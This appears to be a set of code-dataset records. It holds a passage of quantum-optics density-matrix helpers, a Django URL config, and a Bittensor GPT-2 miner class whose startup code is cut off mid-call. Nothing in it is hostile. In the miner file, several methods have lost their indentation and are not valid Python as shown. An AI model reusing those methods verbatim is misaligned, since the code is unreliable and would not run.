             dm[p..., p'...] = state[p...] * conj(state[p'...]).
    """
    # Outer product |psi><psi| over all four channel indices.
    return np.tensordot(state, np.conj(state), axes=0).astype(complex)
def trace_channel(input_matrix, channel=4):
    """
    Tracing one channel of density matrix in 2 channels(modes).
    :param input_matrix: Applied density matrix in 2 channels.
    :param channel: Number of the channel to trace out (2 or 4).
    :return: Applied reduced density matrix of the remaining channel.
    :raises ValueError: If channel is neither 2 nor 4.
    """
    matrix = np.asarray(input_matrix)
    if channel == 4:
        # Keep channel 2: reduced[i, j] = sum_n m[i, n, j, n].
        reduced_matrix = np.einsum('injn->ij', matrix)
    elif channel == 2:
        # Keep channel 4: reduced[i, j] = sum_n m[n, i, n, j].
        reduced_matrix = np.einsum('ninj->ij', matrix)
    else:
        raise ValueError('Invalid configuration')
    return reduced_matrix.astype(complex)
def bs_densmatrix_transform(input_matrix, t, r):
    """
    Beam splitter transformation of density matrix in 2 channels.
    Mapping of creation operators:
    a2 => t b1 + i r b2.
    a4 => t b2 + i r b1.
    :param input_matrix: Applied density matrix in 2 channels.
    :param t: Transmission coefficient.
    :param r: Reflection coefficient.
    :return: Applied density matrix in 2 channels.
    """
    size = len(input_matrix)
    # Output photon numbers can reach 2*(size - 1), hence the doubled size.
    output_matrix = np.zeros((size*2,) * 4, dtype=complex)
    for p1 in range(size):
        for p2 in range(size):
            for p1_ in range(size):
                for p2_ in range(size):
                    # (n, k) index the binomial expansion on the ket side,
                    # (n_, k_) the conjugated expansion on the bra side.
                    for n in range(p1 + 1):
                        for k in range(p2 + 1):
                            for n_ in range(p1_ + 1):
                                for k_ in range(p2_ + 1):
                                    # Output indices for ket (d1, d2) and bra (d1_, d2_).
                                    d1 = p1 - n + k
                                    d2 = n + p2 - k
                                    d1_ = p1_ - n_ + k_
                                    d2_ = n_ + p2_ - k_
                                    # coeff2 is the complex conjugate of the ket-side
                                    # expansion: note (-1j*r) instead of (1j*r).
                                    coeff1 = t**(p1 - n + p2 - k) * (1j*r)**(n + k) * sqrt(factorial(d1) * factorial(d2) * factorial(p1) * factorial(p2)) / (factorial(n) * factorial(p1 - n) * factorial(k) * factorial(p2 - k))
                                    coeff2 = t**(p1_ - n_ + p2_ - k_) * (-1j*r)**(n_ + k_) * sqrt(factorial(d1_) * factorial(d2_) * factorial(p1_) * factorial(p2_)) / (factorial(n_) * factorial(p1_ - n_) * factorial(k_) * factorial(p2_ - k_))
                                    output_matrix[d1, d2, d1_, d2_] = output_matrix[d1, d2, d1_, d2_] + input_matrix[p1, p2, p1_, p2_] * coeff1 * coeff2
    return output_matrix
def prob_distr(input_matrix):
    """
    Photons distribution probability from final density matrix.
    :param input_matrix: Applied density matrix in 2 channels.
    :return: Probability distribution for 2 channels.
    """
    # Diagonal elements dm[m, n, m, n] are the occupation probabilities.
    return np.einsum('mnmn->mn', np.asarray(input_matrix)).astype(complex)
def log_entropy(dm):
    """
    Logarithmic Von Neumann entropy / entanglement.
    :param dm: Applied reduced density matrix.
    :return: Entropy -sum_i w_i * log2(w_i) over the nonzero eigenvalues w_i.
    """
    eigenvalues, _ = np.linalg.eig(dm)
    entropy = 0
    for value in eigenvalues:
        # Skip exact zeros; log2(0) would be undefined.
        if value != 0:
            entropy -= value * np.log2(value)
    return entropy
def partial_transpose(matrix):
    """
    Partial transpose (over the second channel) of a 2-channel density matrix.
    :param matrix: Density matrix in 2 channels.
    :return: Density matrix with res[p1, p2, p1_, p2_] = matrix[p1, p2_, p1_, p2].
    """
    # Swapping p2 and p2_ is the axis permutation (0, 3, 2, 1).
    return np.transpose(np.asarray(matrix), (0, 3, 2, 1)).astype(complex)
def linear_entropy(dm):
    """
    Linear entropy 1 - Tr(rho^2).
    :param dm: Reduced density matrix.
    :return: Linear entropy.
    """
    purity = np.trace(np.matmul(dm, dm))
    return 1 - purity
def reorganise_dens_matrix(rho):
    """
    Reorganise density matrix in 2 channels:
    rho[m, n, m_, n_] ==> rho_out[k, k_] with k = m*size + n, k_ = m_*size + n_.
    :param rho: Density matrix in 2 channels.
    :return: Reorganised (size^2 x size^2) density matrix.
    """
    size = len(rho)
    # A C-order reshape merges (m, n) -> k and (m_, n_) -> k_ exactly as above.
    return np.asarray(rho).reshape(size * size, size * size).astype(complex)
def negativity(rho, neg_type='logarithmic'):
    """
    Calculating negativity for 2 channels: the sum of the absolute values of
    the negative eigenvalues of the partial transpose, optionally mapped to
    the logarithmic negativity log2(2N + 1).
    :param rho: Applied density matrix in 2 channels.
    :param neg_type: Negativity type: 'logarithmic' or 'raw'.
    :return: Negativity.
    :raises ValueError: If neg_type is not a recognised type.
    """
    part_transposed = partial_transpose(rho)
    # Flatten [m, n, m_, n_] -> [k, k_] so np.linalg.eig can be applied.
    reorg_rho = reorganise_dens_matrix(part_transposed)
    w, v = np.linalg.eig(reorg_rho)
    neg = 0
    # Accumulate |Re(lambda)| over the negative eigenvalues.
    for eigval in w:
        if np.real(eigval) < 0:
            neg = neg + np.abs(np.real(eigval))
    if neg_type == 'logarithmic':
        return np.log2(2 * neg + 1)
    elif neg_type == 'raw':
        return neg
    else:
        raise ValueError('Incorrect configuration')
def phase_modulation(rho, phase, channel):
    """
    A phase modulation for the density matrix in 2 channels.

    Multiplies each element by exp(i * phase * (p - p_)), where p/p_ are the
    photon-number indices of the modulated channel.
    :param rho: Density matrix in 2 channels.
    :param phase: Phase.
    :param channel: Channel to modulate (1 or 2).  (Fixes the old docstring
        typo ``channe``.)
    :return: Modulated density matrix in 2 channels.
    :raises ValueError: If channel is neither 1 nor 2.
    """
    # Zero phase is the identity; keep the original early-return behaviour.
    if phase == 0:
        return rho
    size = len(rho)
    # factors[p, p_] = exp(i * phase * (p - p_)); broadcast onto the two
    # axes of the modulated channel (replaces the former O(size^4) loops).
    diff = np.arange(size)[:, None] - np.arange(size)[None, :]
    factors = np.exp(1j * phase * diff)
    if channel == 1:
        # Axes 0 and 2 hold (p1, p1_).
        return rho * factors[:, None, :, None]
    elif channel == 2:
        # Axes 1 and 3 hold (p2, p2_).
        return rho * factors[None, :, None, :]
    else:
        raise ValueError('Incorrect configuration')
def phase_modulation_state(state, phase):
    """
    A phase modulation for the state in two channels.
    Amplitudes are multiplied by exp(i * p1 * phase) along the first channel.
    :param state: Unapplied state in 2 channels.
    :param phase: Phase.
    :return: Modulated unapplied state in 2 channels.
    """
    size = len(state)
    factors = np.exp(1j * phase * np.arange(size))
    return (np.asarray(state) * factors[:, None]).astype(complex)
def make_state_appliable(state):
    """
    Apply operators to the state in 2 channels.
    Each amplitude is scaled by sqrt(p1! * p2!).
    :param state: Unapplied state in 2 channels.
    :return: Applied state in 2 channels.
    """
    size = len(state)
    st_appl = np.zeros((size, size), dtype=complex)
    for i, j in np.ndindex(size, size):
        st_appl[i, j] = state[i, j] * sqrt(factorial(i) * factorial(j))
    return st_appl
def make_state_appliable_4ch(state):
    """
    Apply operators to state in 4 channels.
    Each amplitude is scaled by sqrt(p1! * p2! * p3! * p4!).
    :param state: Unapplied state in 4 channels.
    :return: Applied state in 4 channels.
    """
    size = len(state)
    st_appl = np.zeros((size,) * 4, dtype=complex)
    for idx in np.ndindex(size, size, size, size):
        weight = 1
        for photons in idx:
            weight *= factorial(photons)
        st_appl[idx] = state[idx] * sqrt(weight)
    return st_appl
def bs_parameters(T_min, T_max, num):
    """
    Generating BS's t and r parameters arrays.
    The grid is uniform in the "big" T coordinate, with t = sqrt(T) and
    r = sqrt(1 - t^2).
    :param T_min: T min.
    :param T_max: T max.
    :param num: length.
    :return: BS's t and r small coefficients.
    """
    big_T = np.linspace(T_min, T_max, num)
    t_array = np.sqrt(big_T)
    r_array = np.array([sqrt(1 - t * t) for t in t_array])
    return t_array, r_array
def bs_parameters_small(t_min, t_max, num):
    """
    Generating BS's t and r parameters arrays.
    The grid is uniform in the "small" t coordinate, with r = sqrt(1 - t^2).
    :param t_min: t min.
    :param t_max: t max.
    :param num: length.
    :return: BS's t and r small coefficients.
    """
    t_array = np.linspace(t_min, t_max, num)
    r_array = np.array([sqrt(1 - t * t) for t in t_array])
    return t_array, r_array
|
18,345 | 0000c0c5454229c480bee1bbdafe67c7544ddb48 | from django.urls import path
from . import views
from . views import UsersLoginView
# URL routes for the users app: registration, profile and token handling.
urlpatterns = [
    path('register/', views.register),
    path('profile/',views.profile),
    # path('login/', views.login),
    # Login handled by the class-based view; presumably issues an auth token
    # (name suggests JWT "obtain" endpoint) - verify against UsersLoginView.
    path('login/', UsersLoginView.as_view(), name='obtain_token'),
    path('token/refresh/',views.refresh,name='refresh_token'),
    # path('token/verify/',MyTokenVerifyView.as_view(),name='verify_token')
    # path('token/delete/',TokenCookieDeleteView.as_view(), name='token_delete')
]
|
18,346 | 7607523cc0a0d2be478daeec89a2efcb4be63792 | #!/bin/python3
# The MIT License (MIT)
# Copyright © 2021 Yuma Rao
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
# documentation files (the “Software”), to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of
# the Software.
# THE SOFTWARE IS PROVIDED “AS IS”, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
# THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
""" The Exodus miner.
Example:
$ python miners/text/gpt2_exodus.py
"""
import argparse
import bittensor
import math
import torch
import traceback
import os
import sys
import yaml
from termcolor import colored
from typing import List
from qqdm import qqdm, format_str
from datetime import datetime
from loguru import logger; logger = logger.opt(colors=True)
from types import SimpleNamespace
from nuclei.gpt2 import GPT2Nucleus
from routers.sgmoe import SGMOERouter
from torch.nn.utils import clip_grad_norm_
from tensorboard import program
from torch.utils.tensorboard import SummaryWriter
import bittensor.utils.networking as net
class neuron:
def __init__( self, config: 'bittensor.config' = None ):
    r""" Initializes a neuron with the passed config.

    Builds all miner components: wallet, dendrite (outgoing RPC), subtensor
    (chain connection), metagraph (network state), axon (serving endpoint
    wired to self.forward / self.backward), dataset, router and nucleus
    (routing delegated back to self.route), one SGD optimizer over router +
    nucleus parameters, and a tensorboard writer.
    """
    if config == None: config = neuron.config()
    self.config = config; neuron.check_config( self.config ); print ( self.config )
    bittensor.logging (
        config = self.config,
        logging_dir = self.config.neuron.full_path,
    )
    self.device = torch.device(
        device = self.config.neuron.device
    )
    self.wallet = bittensor.wallet(
        config = self.config
    )
    self.dendrite = bittensor.dendrite(
        config = self.config,
        wallet = self.wallet
    )
    self.subtensor = bittensor.subtensor(
        config = self.config
    )
    self.metagraph = bittensor.metagraph(
        config = self.config
    )
    # The axon serves this miner to the network; incoming forward/backward
    # queries are dispatched to the callbacks below.
    self.axon = bittensor.axon (
        config = self.config,
        wallet = self.wallet,
        forward_callback = self.forward,
        backward_callback = self.backward
    )
    self.dataset = bittensor.dataloader (
        config = self.config
    )
    self.router = SGMOERouter(
        config = self.config
    ).to( self.device )
    # The nucleus calls back into self.route to query remote peers.
    self.nucleus = GPT2Nucleus(
        config = self.config,
        routing_callback = self.route
    ).to( self.device )
    self.optimizer = torch.optim.SGD(
        [
            {"params": self.router.parameters()},
            {"params": self.nucleus.parameters()}
        ],
        lr = self.config.neuron.learning_rate,
        weight_decay = self.config.neuron.weight_decay,
    )
    self.tensorboard = SummaryWriter(
        log_dir = self.config.neuron.tensorboard_dir
    )
    # Per-peer moving-average weights; starts empty and is padded to
    # metagraph.n in reload().
    self.mechanism_weights = torch.ones( [0] )
    self.epoch = 0
    self.global_step = 0
    # Start below inf so the first checkpoint() comparison can trigger a save.
    self.epoch_loss = math.inf/2
    self.best_epoch_loss = math.inf
@staticmethod
def config() -> 'bittensor.Config':
    r""" Fills a config namespace object with defaults or information from the command line.

    Also merges defaults from an optional YAML file passed via
    --neuron.config and the arguments of every involved bittensor
    component, nucleus and router.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument('--neuron.config', type=str, help='If set, defaults are overridden by passed file.')
    parser.add_argument('--neuron.modality', type=int, help='''Miner network modality. TEXT=0, IMAGE=1. Currently only allowed TEXT''', default=0)
    parser.add_argument('--neuron.use_upnpc', action='store_true', help='''Turns on port forwarding on your router using upnpc.''', default=False)
    parser.add_argument('--neuron.use_tensorboard', action='store_true', help='Turn on bittensor logging to tensorboard', default=True)
    parser.add_argument('--neuron.learning_rate', type=float, help='Training initial learning rate.', default=3e-2)
    parser.add_argument('--neuron.weight_decay', type=float, help='nucleus parameter weight decay.', default=0.25)
    parser.add_argument('--neuron.clip_gradients', type=float, help='Implement gradient clipping to avoid exploding loss on smaller architectures.', default=1.0)
    parser.add_argument('--neuron.n_epochs', type=int, help='Number of training epochs.', default=sys.maxsize )
    parser.add_argument('--neuron.epoch_length', type=int, help='Iterations of training per epoch', default=500)
    parser.add_argument('--neuron.batch_size_train', type=int, help='Training batch size.', default=2)
    parser.add_argument('--neuron.reload', action='store_true', help='''Reload training from previous trial run.''', default=False )
    parser.add_argument('--neuron.restart_on_failure', action='store_true', help='''Restart miner on unknown error.''', default=False)
    parser.add_argument('--neuron.compute_remote_gradients', action='store_true', help='''Does the neuron compute and return gradients from backward queries.''', default=False)
    parser.add_argument('--neuron.accumulate_remote_gradients', action='store_true', help='''Does the neuron accumulate remote gradients from backward queries.''', default=False)
    parser.add_argument('--neuron.name', type=str, help='Trials for this miner go in miner.root / (wallet_cold - wallet_hot) / miner.name ', default='gpt2_exodus')
    parser.add_argument('--neuron.device', type=str, help='Neuron default training device cpu/cuda', default=("cuda" if torch.cuda.is_available() else "cpu"))
    bittensor.logging.add_args( parser )
    bittensor.wallet.add_args( parser )
    bittensor.subtensor.add_args( parser )
    bittensor.metagraph.add_args( parser )
    bittensor.dataloader.add_args( parser )
    bittensor.dendrite.add_args( parser )
    bittensor.axon.add_args( parser )
    GPT2Nucleus.add_args( parser )
    SGMOERouter.add_args( parser )
    # A YAML file (if given) overrides parser defaults; explicit command-line
    # arguments still take precedence over both.
    config_file_path = vars(parser.parse_known_args()[0])['neuron.config']
    if config_file_path:
        #loads config_file and updates defaults
        config_file_path = os.path.expanduser(config_file_path)
        try:
            with open(config_file_path) as f:
                params_config = yaml.safe_load(f)
            print('Config File Detected at {} updating defaults'.format(config_file_path))
            parser.set_defaults(**params_config)
        except Exception as e:
            # Best-effort: fall back to built-in defaults on any load error.
            print('Error in loading: {} using default parser settings'.format(e))
    return bittensor.config( parser )
@staticmethod
def check_config( config: 'bittensor.Config' ):
    r""" Checks/validates the config namespace object.

    Also derives config.neuron.full_path and config.neuron.tensorboard_dir
    and creates the trial directory on disk if it is missing.
    """
    assert config.neuron.batch_size_train > 0, "batch_size_train must be a positive value"
    assert config.neuron.learning_rate > 0, "learning_rate must be a positive value."
    bittensor.logging.check_config( config )
    bittensor.wallet.check_config( config )
    bittensor.subtensor.check_config( config )
    bittensor.metagraph.check_config( config )
    bittensor.dataloader.check_config( config )
    bittensor.dendrite.check_config( config )
    bittensor.axon.check_config( config )
    GPT2Nucleus.check_config( config )
    SGMOERouter.check_config( config )
    # Trial directory layout: <logging_dir>/<coldkey-hotkey>/<miner name>.
    full_path = os.path.expanduser('{}/{}/{}'.format( config.logging.logging_dir, config.wallet.name + "-" + config.wallet.hotkey, config.neuron.name ))
    config.neuron.full_path = os.path.expanduser(full_path)
    # Timestamped tensorboard directory: a fresh one per run.
    config.neuron.tensorboard_dir = config.neuron.full_path + '/tensorboard-' + '-'.join(str(datetime.now()).split())
    if not os.path.exists(config.neuron.full_path):
        os.makedirs(config.neuron.full_path)
def __enter__(self):
    # Context-manager entry; delegates to self.startup() (defined elsewhere
    # in this class, outside the visible region).
    self.startup()
def __exit__ ( self, exc_type, exc_value, exc_traceback ):
    # Context-manager exit; delegates to self.shutdown() (defined elsewhere
    # in this class). Runs regardless of whether an exception occurred.
    self.shutdown()
def run( self ):
    r""" Miner main loop.

    Trains epoch after epoch until config.neuron.n_epochs, setting chain
    weights and checkpointing after each epoch. On unknown errors it either
    reloads the last saved state (restart_on_failure) or exits.
    """
    # ---- Startup/Shutdown ----
    with self:

        # ---- Optionally reload from previous run ----
        if self.config.neuron.reload:
            self.reload()
        else:
            self.checkpoint()

        # --- Run until n_epochs ----
        while self.epoch < self.config.neuron.n_epochs:
            try:
                # ---- Train state ----
                self.run_epoch()

                # ---- Set weights on chain ----
                # (set_mechanism_weights is defined elsewhere in this class.)
                self.set_mechanism_weights()

                # ---- Checkpoint state ----
                self.checkpoint()

            except KeyboardInterrupt:
                # --- User ended session ----
                break

            except Exception as e:
                # --- Unknown error ----
                logger.exception('Unknown exception: {} with traceback {}', e, traceback.format_exc())
                if self.config.neuron.restart_on_failure == True:
                    logger.info('Restarting from last saved state.')
                    self.reload()
                else:
                    break
# --- Run Epoch ----
def run_epoch( self ):
    r""" Runs a single training epoch pulled from the dataloader.

    Updates self.epoch_loss (mean local target loss over epoch_length
    iterations), self.global_step and self.epoch.
    """
    # --- Init Epoch ----
    total_epoch_loss = 0.0
    epoch_batches = self.dataset.dataloader( self.config.neuron.epoch_length )
    progress_bar = qqdm(enumerate(epoch_batches), total=len(epoch_batches), desc=format_str('blue', f'Epoch Progress'))
    for iteration, (inputs) in progress_bar:

        # ---- Forward / Backward ----
        # Snapshot mechanism weights around the step so the delta can be logged.
        prev_mechanism_weights = self.mechanism_weights.tolist()
        output = self.train ( batch = { 'inputs': inputs } )
        next_mechanism_weights = self.mechanism_weights.tolist()
        total_epoch_loss += output.local_target_loss.item()

        # ---- Logs ----
        # (epoch_logs is defined elsewhere in this class.)
        self.epoch_logs (
            progress_bar,
            iteration = iteration,
            output = output,
            prev_mechanism_weights = prev_mechanism_weights,
            next_mechanism_weights = next_mechanism_weights
        )
        self.global_step += 1

    self.epoch_loss = total_epoch_loss / self.config.neuron.epoch_length
    self.epoch += 1
# ---- Training call ----
def train ( self, batch: dict ) -> SimpleNamespace:
    r""" Runs a single training batch through the nucleus and applies a gradient update.
        Args:
            batch ( dict, `required`):
                training batch dictionary.
        Returns:
            output = SimpleNamespace (
                local_context (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_len, bittensor.__network_dim__)`, `required`):
                    Representations produced by the nucleus's distillation-model prior to producing the hidden units.
                local_hidden (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_len, bittensor.__network_dim__)`, `required`):
                    Hidden layer representations produced using the local_context.
                local_target (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_len, bittensor.__vocab_size__)`, `required`):
                    GPT2 MLM target predictions produced using local_hidden.
                local_target_loss (:obj:`torch.FloatTensor` of shape :obj:`(1)`, `required`):
                    GPT2 MLM loss computed from the local_target.
                remote_context (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_len, bittensor.__network_dim__)`, `required`):
                    Representations returned from the nucleus.route function after querying the network.
                remote_hidden (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_len, bittensor.__network_dim__)`, `required`):
                    Hidden layer representations produced using the remote_context.
                remote_target (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, bittensor.__vocab_size__)`, `required`):
                    GPT MLM Target predictions produced using remote_hidden.
                remote_target_loss (:obj:`torch.FloatTensor` of shape :obj:`(1)`, `required`):
                    GPT2 MLM loss computed from the remote_target.
                distillation_loss (:obj:`torch.FloatTensor` of shape :obj:`(1)`, `required`):
                    Distillation loss between local_context and remote_context.
            )
    """
    # ---- Forward pass ----
    inputs = batch['inputs']
    output = self.nucleus.remote_forward(
        inputs = inputs.to( self.device ),
        training = True,
    )

    # ---- Backward pass ----
    # Joint objective: local LM loss + distillation to the remote context
    # + remote LM loss.
    output.loss = output.local_target_loss + output.distillation_loss + output.remote_target_loss
    output.loss.backward() # Accumulates gradients on the nucleus.
    # Clip both parameter groups to bound the update magnitude.
    clip_grad_norm_(self.nucleus.parameters(), self.config.neuron.clip_gradients)
    clip_grad_norm_(self.router.parameters(), self.config.neuron.clip_gradients)
    self.optimizer.step() # Applies accumulated gradients.
    self.optimizer.zero_grad() # Zeros out gradients for next accummulation

    # ---- Update global loss ----
    return output
# ---- Axon Forward call ----
def forward ( self, pubkey:str, inputs_x: torch.FloatTensor, modality:int ) -> torch.FloatTensor:
    r""" Subscribed to an axon servicing endpoint: processes forward messages from the wire.
        The arguments reflect an RPC request from another miner in the network, the response tensor
        should be the hidden units computed using the local context and with shape: [batch_size, sequence_len, __network_dim__].
        Args:
            pubkey ( str, `required`):
                The public key of the caller.
            inputs_x ( :obj:`torch.Tensor`, `required`):
                torch inputs to be forward processed.
            modality ( bittensor.proto.Modality, `required`):
                modality of inputs e.g. bittensor.proto.Modality.TEXT.
        Returns:
            outputs (:obj:`torch.FloatTensor`):
                The nucleus's outputs as a torch tensor of shape [batch_size, sequence_len, __network_dim__]
    """
    # Only the local (distillation) model is used for serving; no remote
    # network queries are made on behalf of the caller.
    inputs_x = inputs_x.to( self.device )
    output = self.nucleus.local_forward (
        inputs = inputs_x
    )
    return output.local_hidden
# ---- Axon Backward call ----
def backward ( self, pubkey:str, inputs_x:torch.FloatTensor, grads_dy:torch.FloatTensor, modality:int ) -> torch.FloatTensor:
    r""" Subscribed to an axon servicing endpoint: Processes backward messages from the wire.
        Arguments reflect an RPC backward request from another miner in the network, the response tensor
        should be the gradients of the miner's nucleus w.r.t to the inputs_x and the passed output grads_dy.
        Args:
            pubkey ( str, `required`):
                The public key of the caller.
            inputs_x ( :obj:`torch.Tensor`, `required`):
                torch inputs from previous forward call.
            grads_dy ( :obj:`torch.Tensor`, `required`):
                torch grads of forward output.
            modality ( bittensor.proto.Modality, `required`):
                modality of inputs e.g. bittensor.proto.Modality.TEXT.
        Returns:
            outputs (:obj:`torch.FloatTensor`, `optional`):
                The gradients w.r.t to the inputs [batch_size, sequence_len, -1]
    """
    if self.config.neuron.compute_remote_gradients:
        with torch.enable_grad():

            # ---- Set up inputs for gradient computations.
            # NOTE(review): requires_grad is set before .to(); if the device
            # copy creates a new non-leaf tensor, inputs_x.grad may remain
            # None after backward - confirm intended behaviour.
            inputs_x.requires_grad = True
            inputs_x = inputs_x.to( self.device )
            grads_dy = grads_dy.to( self.device )
            outputs_y = self.nucleus.local_forward( inputs = inputs_x ).to( self.device )

            # ---- The backward call will accumulate gradients on our parameters.
            if self.config.neuron.accumulate_remote_gradients:
                torch.autograd.backward (
                    tensors = [outputs_y],
                    grad_tensors = [grads_dy]
                )
                return inputs_x.grad if inputs_x.grad != None else None

            # ---- The backward call will simply compute the gradients without accumulating them.
            else:
                grads_dy = torch.autograd.grad (
                    outputs = outputs_y,
                    inputs = inputs_x,
                    grad_outputs = grads_dy,
                    only_inputs = True,
                    create_graph = False,
                    retain_graph = False
                )[0]
                return grads_dy

    # if ! compute_remote_gradients, NO-OP.
    else:
        return None
def route ( self, inputs: torch.LongTensor, query: torch.FloatTensor ) -> torch.FloatTensor:
    r""" Subscribed to the nucleus. Called during nucleus.remote_forward. Accepts inputs and
        a query. Routes inputs through the network to remote neurons based on query.
        Args:
            inputs (:obj:`torch.LongTensor` of shape :obj:`(batch_size, sequence_dim)`, `required`):
                Inputs to send on the wire.
            query (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, query_dim)`, `required`):
                Query tensor used to selected which neurons to send inputs to.
        Returns:
            response (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_len, bittensor.__network_dim__)`, `required`):
                Joined responses from the network call.
    """
    # ---- Forward messages through network ----
    outputs = self.router.forward_text( self.metagraph, self.dendrite, inputs, query )

    # ---- Train mechanism weights ----
    # Exponential moving average with decay factor 0.1 over router weights.
    self.mechanism_weights = (1 - 0.1) * self.mechanism_weights + 0.1 * outputs.weights # Moving avg update.

    # ---- Return response -----
    return outputs.response
def checkpoint( self ):
r""" Optionally Saves, updates and then reloads the miner training state.
"""
last_saved = self.get_saved_state()
if last_saved == None or last_saved['epoch_loss'] >= self.epoch_loss:
self.save()
self.metagraph.load()
self.metagraph.sync()
self.metagraph.save()
self.reload()
def get_saved_state( self ):
r""" Returns a saved state dict or none.
"""
try:
return torch.load("{}/model.torch".format( self.config.neuron.full_path ))
except Exception as e:
logger.exception('Failed to reload model with error: {}', e)
return None
    def reload( self ):
        r""" Reloads/updates the training state from the disk.

        Restores epoch counters, router/nucleus parameters, optimizer
        hyper-parameters and mechanism weights from the saved checkpoint,
        resizing chain-dependent state to the current metagraph first.
        """
        # NOTE(review): get_saved_state() returns None when the checkpoint is
        # missing/unreadable; the subscripts below would then raise — confirm
        # callers only invoke reload() after a successful save.
        state_dict = self.get_saved_state()
        # ---- Load training state.
        self.epoch = state_dict['epoch']
        self.epoch_loss = state_dict['epoch_loss']
        self.global_step = state_dict['global_step']
        # ---- Load router and resize to the metagraph size.
        # Resize BEFORE load_state_dict so shapes match; strict=False tolerates
        # a grown metagraph since the checkpoint was written.
        self.router.sync_with_chain_state( self.metagraph ) # Resize the router.
        self.router.load_state_dict( state_dict['router_state'], strict=False ) # Load router
        # ---- Load nucleus and attach the routing function.
        self.nucleus.load_state_dict( state_dict['nucleus_state'] ) # Load nucleus
        self.nucleus.attach( self )# Re-assign the routing function.
        # --- Load optimizer.
        # Optimizer is rebuilt (not state-restored) with the saved lr/decay so
        # it binds to the freshly loaded parameter tensors.
        optim_groups = [
            {"params": self.router.parameters() },
            {"params": self.nucleus.parameters() },
        ]
        self.optimizer = torch.optim.SGD(
            optim_groups,
            lr = state_dict['optimizer_state']['param_groups'][0]['lr'],
            weight_decay = state_dict['optimizer_state']['param_groups'][0]['weight_decay'],
        )
        # ---- Load mechanism weights and pad to size.
        # Zero-pad the saved weight row out to the current number of peers.
        self.mechanism_weights = state_dict['mechanism_weights']
        self.mechanism_weights = torch.nn.functional.pad (
            self.mechanism_weights,
            pad = [0, self.metagraph.n - self.mechanism_weights.numel()],
            value=0
        )
        bittensor.logging.success( prefix = 'Reloaded model', sufix = '<blue>{}/model.torch</blue>'.format( self.config.neuron.full_path ))
def save( self ):
r""" Saves the training state to disk.
"""
try:
state_dict = {
'epoch': self.epoch,
'epoch_loss': self.epoch_loss,
'global_step': self.global_step,
'mechanism_weights': self.mechanism_weights, # Save row.
'router_state': self.router.state_dict(), # Save router state.
'nucleus_state': self.nucleus.state_dict(), # Save nucleus state.
'optimizer_state': self.optimizer.state_dict(), # Save optimizer.
}
torch.save( state_dict, "{}/model.torch".format( self.config.neuron.full_path, self.epoch_loss ) )
bittensor.logging.success(prefix='Saved model', sufix='<blue>{}/model.torch</blue>'.format( self.config.neuron.full_path ) )
except Exception as e:
logger.exception('Failed to save model with error:{}', e)
def set_mechanism_weights( self ):
r""" Sets the mechanism weights on chain.
"""
try:
uids = self.metagraph.uids
did_set = self.subtensor.set_weights(
wallet = self.wallet,
uids = uids,
weights = self.mechanism_weights,
wait_for_inclusion = True
)
if did_set:
logger.success('Set weights:'.ljust(20) + '{}', self.mechanism_weights.tolist())
else:
logger.warning('Failed to set weights on chain.')
self.subtensor = bittensor.subtensor( config = self.config.subtensor )
self.subtensor.connect()
except Exception as e:
logger.error('Failure setting weights on chain with error: {}', e)
    def startup( self ):
        r""" Starts and subscribes the miner.

        Sequence: map an external port (upnpc or static config), discover the
        external IP, optionally launch tensorboard, ensure wallet keys exist,
        subscribe the endpoint on chain, then start serving the axon.
        Raises RuntimeError when any mandatory step fails.
        """
        # ---- Setup UPNPC ----
        if self.config.neuron.use_upnpc:
            bittensor.logging.success(prefix = 'Set upnpc', sufix = '<green>ON</green>')
            try:
                self.external_port = net.upnpc_create_port_map( port = self.axon.port )
            except net.UPNPCException as upnpc_exception:
                logger.critical('Failed to hole-punch with upnpc')
                raise RuntimeError('Failed to hole-punch with upnpc')
        else:
            # NOTE(review): reads self.config.axon.port here but self.axon.port
            # above — confirm the two are always identical.
            bittensor.logging.success(prefix = 'Set upnpc', sufix = '<red>OFF</red>')
            self.external_port = self.config.axon.port
        # ---- Get external ip ----
        try:
            self.external_ip = net.get_external_ip()
            bittensor.logging.success(prefix = 'External IP', sufix = '<blue>{}</blue>'.format(self.external_ip))
        except net.ExternalIPNotFound as external_port_exception:
            raise RuntimeError('Unable to attain your external ip. Check your internet connection. error:{}', external_port_exception)
        # ---- Setup tensorboard ----
        if self.config.neuron.use_tensorboard == True:
            self._tensorboard_program = program.TensorBoard()
            self._tensorboard_program.configure(argv=[None, '--logdir', self.config.neuron.full_path, '--load_fast=true'])
            self._tensorbaord_url = self._tensorboard_program.launch()
            bittensor.logging.success(prefix = 'Set tensorboard', sufix = '<blue>http://localhost:6006/</blue>')
        else: bittensor.logging.success(prefix = 'Set tensorboard', sufix = '<red>OFF</red>')
        # ---- Setup Wallet. ----
        # Create keys when missing; the second check guards against a failed
        # (e.g. user-aborted) creation.
        if not self.wallet.has_coldkeypub:
            self.wallet.create_new_coldkey( n_words = 12, use_password = True )
        if not self.wallet.has_coldkeypub:
            raise RuntimeError('Miner must have access to a decrypted coldkeypub')
        if not self.wallet.has_hotkey:
            self.wallet.create_new_hotkey( n_words = 12, use_password = False )
        if not self.wallet.has_hotkey:
            raise RuntimeError('Miner must have access to a decrypted hotkey')
        # ---- Subscribe to chain ----
        # Registers this endpoint (ip/port, TEXT modality) on the network.
        subscribe_success = self.subtensor.subscribe(
                wallet = self.wallet,
